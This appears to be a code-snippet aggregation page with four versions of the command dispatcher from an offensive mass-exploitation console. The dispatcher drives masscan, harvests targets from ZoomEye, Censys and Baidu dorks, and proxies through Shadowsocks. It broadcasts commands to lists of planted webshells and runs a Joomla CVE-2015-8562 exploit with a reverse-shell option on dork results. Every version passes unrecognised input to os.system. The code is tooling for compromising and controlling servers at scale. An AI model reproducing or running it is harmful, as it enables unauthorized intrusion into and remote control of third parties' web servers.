Exemple #1
0
def run_zoomeye(**kwargs):
    """
    Crawler for ZoomEye
    """

    try:
        console.print_warning(
            "[*] ZoomEye now asks for phone verification (+86 only)")
        zoomeye.run()
    except (EOFError, KeyboardInterrupt, SystemExit):
        return
    except BaseException:
        console.debug_except()
Exemple #2
0
def execute(cmd):
    '''
    handles user input in console
    '''

    # lol i don't want any errors here
    cmd = str(cmd).lower().strip()

    if cmd == '':
        return
    if cmd == "masscan":
        # check root, as masscan requires root privilege
        if os.geteuid() != 0:
            console.print_error(
                "[-] Please run mec as root in order to run masscan")
            return

        ports = console.input_check(
            "[?] What ports do you want to scan (eg. 80 443)? ").split()

        try:
            scan.masscan(ports)
        except KeyboardInterrupt:
            console.print_warning("[-] masscan exited")
    elif cmd == 'info':
        colored_print(
            '[*] Current directory: {}\
            \n[*] Init directory: {}\
            \n[*] Log file: {}\
            \n[*] Target: {}\
            \n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir,
                                           SESSION.logfile, SESSION.ip_list,
                                           SESSION.proxy_conf), colors.CYAN)

    elif cmd.startswith('target'):
        target = ''.join(cmd.split()[1:])
        if target not in os.listdir(SESSION.init_dir + '/data'):
            console.print_error("[-] Target file not found")
            return
        colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
        SESSION.ip_list = SESSION.init_dir + \
            '/data/' + target

    elif cmd in ('init', 'i'):
        colored_print('[*] Going back to init_dir...', colors.BLUE)
        os.chdir(SESSION.init_dir)

    elif cmd.startswith('baidu'):
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            colored_print('[*] Searching on Baidu...', colors.PURPLE)
            baidu.spider(dork, count)

            if yes_no("Use collected URL's as target?"):
                SESSION.ip_list = SESSION.init_dir + "result.txt"

        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            return

    elif cmd == 'proxy':
        if not os.path.exists(SESSION.ss_config):
            console.print_error('[-] Please make sure {} exists'.format(
                SESSION.ss_config))
        try:
            subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             shell=False)
        except BaseException as err:
            console.print_error('[-] Error starting Shadowsocks proxy: ' +
                                str(err))
            debug_except()

    elif cmd == 'redis':
        console.print_error('[-] Under development')

    elif cmd.startswith('google'):
        try:
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            subprocess.call([
                './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork,
                '--revshell=\'127.0.0.1\'', '--port=4444'
            ])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()

    elif cmd in ('q', 'quit'):
        check_kill_process('ss-proxy')
        sys.exit(0)

    elif cmd in ('h', 'help', '?'):
        print(console.HELP_INFO)

    elif cmd == 'exploits':
        colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in list_exp():
            colored_print(poc, colors.BLUE)

    elif cmd in ('z', "zoomeye"):
        try:
            console.print_warning(
                "[*] ZoomEye now asks for phone verification (+86 only)")
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        else:
            debug_except()
    elif cmd == "censys":
        try:
            output = censys.start()
            if yes_no("Use collected URL's as target?"):
                SESSION.ip_list = SESSION.init_dir + "/" + output
                colored_print(
                    '[i] Target changed to {}'.format(SESSION.ip_list),
                    colors.BLUE)

        except BaseException:
            return
    elif cmd in ('x', 'reset'):
        os.system("reset")

    elif cmd in ('c', 'clear'):
        os.system("clear")

    elif cmd in ("attack", "e"):
        attack()

    else:
        try:
            print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END,
                  colors.GREEN + cmd, colors.END)
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
Exemple #3
0
def execute(cmd):
    '''
    handles user input in console
    '''

    cmd = str(cmd).lower().strip()
    if cmd == '':
        pass
    elif cmd == 'info':
        print(colors.CYAN + '[*] Current directory: {}\
            \n[*] Init directory: {}\
            \n[*] Target: {}\
            \n[*] Proxy config: {}'.format(
            os.getcwd(), SessionParameters.INIT_DIR, SessionParameters.IP_LIST,
            SessionParameters.PROXY_CONF) + colors.END)
    elif cmd.startswith('target'):
        target = ''.join(cmd.split()[1:])
        if not target.endswith('.txt'):
            return
        print(colors.BLUE + '[i] Target changed to {}'.format(target))
        SessionParameters.IP_LIST = SessionParameters.INIT_DIR + \
            '/data/' + target
    elif cmd == 'init' or cmd == 'i':
        print(colors.CYAN + '[*] Going back to init_dir...' + colors.END)
        os.chdir(SessionParameters.INIT_DIR)
    elif cmd.startswith('baidu'):
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SessionParameters.OUT_DIR)
            print(colors.PURPLE + '[*] Searching on Baidu...' + colors.END)
            baidu.spider(dork, count)
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            return
    elif cmd == 'proxy':
        if not os.path.exists(SessionParameters.SS_CONFIG):
            console.print_error('[-] Please make sure {} exists'.format(
                SessionParameters.SS_CONFIG))
        try:
            subprocess.Popen([
                SessionParameters.PROXY_BIN, '-c', SessionParameters.SS_CONFIG
            ],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             shell=False)
        except BaseException as err:
            console.print_error('[-] Error starting Shadowsocks proxy: ' +
                                str(err))
            debug_except()
    elif cmd.startswith('webshell'):
        try:
            command = cmd.split()
            if command[1] == '-b':
                try:
                    ws.loadShells('webshell.list')
                    cmd = input(colors.CYAN + 'CMD >> ' + colors.END)
                    ws.broadcast(cmd)
                except BaseException as err:
                    console.print_error(
                        '[-] Error with webshell broadcasting: ' + str(err))
                    debug_except()
            else:
                pass
        except BaseException:
            if cmd == 'webshell':
                try:
                    ws.loadShells('webshell.list')
                    shell = input('[*] Select a shell: ').strip()
                    ws.ctrl(shell)
                except BaseException as err:
                    console.print_error('[-] Error with webshell: ' + str(err))
                    debug_except()
    elif cmd == 'redis':
        console.print_error('[-] Under development')
    elif cmd.startswith('google'):
        try:
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            subprocess.call([
                './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork,
                '--revshell=\'127.0.0.1\'', '--port=4444'
            ])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()
    elif cmd == 'q' or cmd == 'quit':
        check_kill_process('ss-proxy')
        sys.exit(0)
    elif cmd == 'h' or cmd == 'help' or cmd == '?':
        print(console.HELP_INFO)
    elif cmd == 'exploits':
        print(colors.CYAN + '[+] Available exploits: ' + colors.END)
        for poc in list_exp():
            print(colors.BLUE + poc + colors.END)
    elif cmd == 'z' or cmd == "zoomeye":
        try:
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        else:
            debug_except()
    elif cmd == 'x' or cmd == 'clear':
        subprocess.call("clear")
    elif cmd == 'c' or cmd == 'reset':
        subprocess.call("reset")
    elif cmd == "attack" or cmd == "e":
        attack()
    else:
        try:
            print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END +
                  colors.GREEN + cmd + colors.END + '\n')
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
Exemple #4
0
def execute(cmd):
    '''
    handles user input in console
    '''

    cmd = str(cmd).lower().strip()
    if cmd == '':
        return
    elif cmd == 'info':
        print(colors.CYAN + '[*] Current directory: {}\
            \n[*] Init directory: {}\
            \n[*] Target: {}\
            \n[*] Proxy config: {}'.format(os.getcwd(
        ), SESSION.init_dir, SESSION.ip_list, SESSION.proxy_conf) + colors.END)
    elif cmd.startswith('target'):
        target = ''.join(cmd.split()[1:])
        if not target in os.listdir(SESSION.init_dir + '/data'):
            return
        print(colors.BLUE + '[i] Target changed to {}'.format(target))
        SESSION.ip_list = SESSION.init_dir + \
            '/data/' + target
    elif cmd == 'init' or cmd == 'i':
        print(colors.CYAN + '[*] Going back to init_dir...' + colors.END)
        os.chdir(SESSION.init_dir)
    elif cmd.startswith('baidu'):
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            print(colors.PURPLE + '[*] Searching on Baidu...' + colors.END)
            baidu.spider(dork, count)
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            return
    elif cmd == 'proxy':
        if not os.path.exists(SESSION.ss_config):
            console.print_error('[-] Please make sure {} exists'.format(
                SESSION.ss_config))
        try:
            subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             shell=False)
        except BaseException as err:
            console.print_error('[-] Error starting Shadowsocks proxy: ' +
                                str(err))
            debug_except()
    elif cmd == 'redis':
        console.print_error('[-] Under development')
    elif cmd.startswith('google'):
        try:
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            subprocess.call([
                './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork,
                '--revshell=\'127.0.0.1\'', '--port=4444'
            ])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()
    elif cmd == 'q' or cmd == 'quit':
        check_kill_process('ss-proxy')
        sys.exit(0)
    elif cmd == 'h' or cmd == 'help' or cmd == '?':
        print(console.HELP_INFO)
    elif cmd == 'exploits':
        print(colors.CYAN + '[+] Available exploits: ' + colors.END)
        for poc in list_exp():
            print(colors.BLUE + poc + colors.END)
    elif cmd == 'z' or cmd == "zoomeye":
        try:
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        else:
            debug_except()
    elif cmd == 'x' or cmd == 'clear':
        os.system("clear")
    elif cmd == 'c' or cmd == 'reset':
        os.system("reset")
    elif cmd == "attack" or cmd == "e":
        attack()
    else:
        try:
            print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END +
                  colors.GREEN + cmd + colors.END + '\n')
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass